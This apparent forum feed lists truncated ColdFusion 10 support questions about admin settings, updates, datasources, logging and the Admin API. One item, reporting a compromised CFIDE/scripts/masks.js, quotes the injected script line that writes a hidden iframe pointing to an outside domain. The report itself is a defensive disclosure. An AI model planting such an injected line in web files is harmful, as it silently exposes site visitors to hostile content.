Coldfusion server monitor in Japanese: how change language?
Hi, I have a coldfusion 10 developer edition installed. In my admin panel I have english language. But my server monitor is in Japanese. I don't know why. How can I change the language of the monitor?
View ArticleForce IE using Compatibility Mode
Hi, I would like to force IE using compatibility mode to visit webpage. However, after I set the custom header "X-UA-Compatible: IE=EmulateIE9", it stills does not work. Only .NET project can be auto...
View ArticleCF10 Update 11
I am trying to install CF10 Update 11 but it is complaining that the jar file is invalid or corrupt. I have attempted to download it now on 3 different computers with the same result on each.
View ArticleMultiples DSNs' application.cfc
Hi All, Is it possible to set the multiple datasources on a Application.cfc using this.datasouce attribute? CF 9, from application.cfc, you can set<cfsetthis datasouce ="myDSN1" > and no need...
View ArticleColdFusion 10 with windows authentication
We have Windows 2008r2, IIS 7.5, ColdFusion 10 with all the latest patches. The root allows anonymous access, but doesn't have any ColdFusion files. We have subfolder, that do not allow anonymous...
View ArticleSite Documentation
I am wanting to document my web application with online docs. I have written some docs in pdf and posted them, but I would prefer to have an online version where I can update them easier. It will be...
View ArticleConfiguring logging in ColdFusion 10
Hi, Can someone please tell me how to configure the logging options in ColdFusion 10? In particular, we have a lot of WARN and INFO errors in our coldfusion-error.log and coldfusion-out.log files....
View ArticleHow to restart ColdFusion 10 programatically
Hi, Does anyone have the code (CFSCRIPT/CFML) to restart a CF10 instance? The code that worked for us in CF 7 and 8 no longer works on v10. Regards,Mark
View ArticleCF10 RDS enable
It seems the Security section of my CF10 Administrator is missing a number of options. I have users enabled, but I can no longer find where to manage them. I'd also like to enable RDS for some...
View ArticleCF Builder
Hi to all. Going to be out of internet service for 10 days and I still need to code. I have installed CF development server on my desktop and I have SQL server Express for the database. Now what do I...
View ArticleColdFusion errors show Error 500 instead of normal error message
Hi, Strangely, our CF 10 server has started to show "500 - Internal server error" whenever a CF error occurs, instead of the normal error message. The error is logged, but the front end shows the error...
View ArticleCF10 VFS Max Size Limit?
It there a maximum amount of Ram that can be allocated the the virtual file system? When I specify more than 1 GB size, the system returns a negative number for the remaining free space, and any...
View ArticleMySQL aes_encrypt
hi, i am using the mysql aes_encrypt function for encrypting data in the database. i.e. a sample update query that i have: <cfquery name="updateUser" datasource="#application.datasource#">UPDATE...
View ArticleClient Variable Showing Outdated Value Intermittently
We have a legacy ColdFusion application using 150 client variables to manage session state. The client variables are centrally stored in a SQL Server database within a 6 (CF9) application server...
View Articleupload from local or url, the most secure file extension check
In short, I want to allowusers to uploadimagesfrom a localcomputerorurl. So, what's the best aproach to secure my application, more specifically to block all file extensions except those in white list....
View ArticleCFIDE/scripts/masks.js Compromised
We just found an injection at the end of masks.js Here is the content that was added:"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");" Not sure what...
View ArticleGetting browser / version from cgi.http_user_agent
Hi,I am succesfully storing away into the database each individuals cgi.http_user_agent. What a want to do is chop out the browser/platform and version number from the string and display it in a...
View ArticleAdministrator API
This question was posted in response to the following article: http://help.adobe.com/en_US/ColdFusion/10.0/Admin/WSc3ff6d0ea778594611 72e0811cbf364104-7fcf.html
View ArticleInvaild CFML construct
This code excutes on Coldfusion 10... However, Why does it not excute on Coldfusion 8. The line in red is where it fails. <cfscript>if (IsDefined("FORM.fName") AND IsDefined("FORM.lName") AND...
View ArticleHow to select a DSN in CF10 Admin API?
Hi, I am trying to use the Admin API to make CF use a particular DSN. What method is used for this? Is it UPDATEODBCSERVERDSN() or something else? If the DSN is selected, will the server instance...
View Article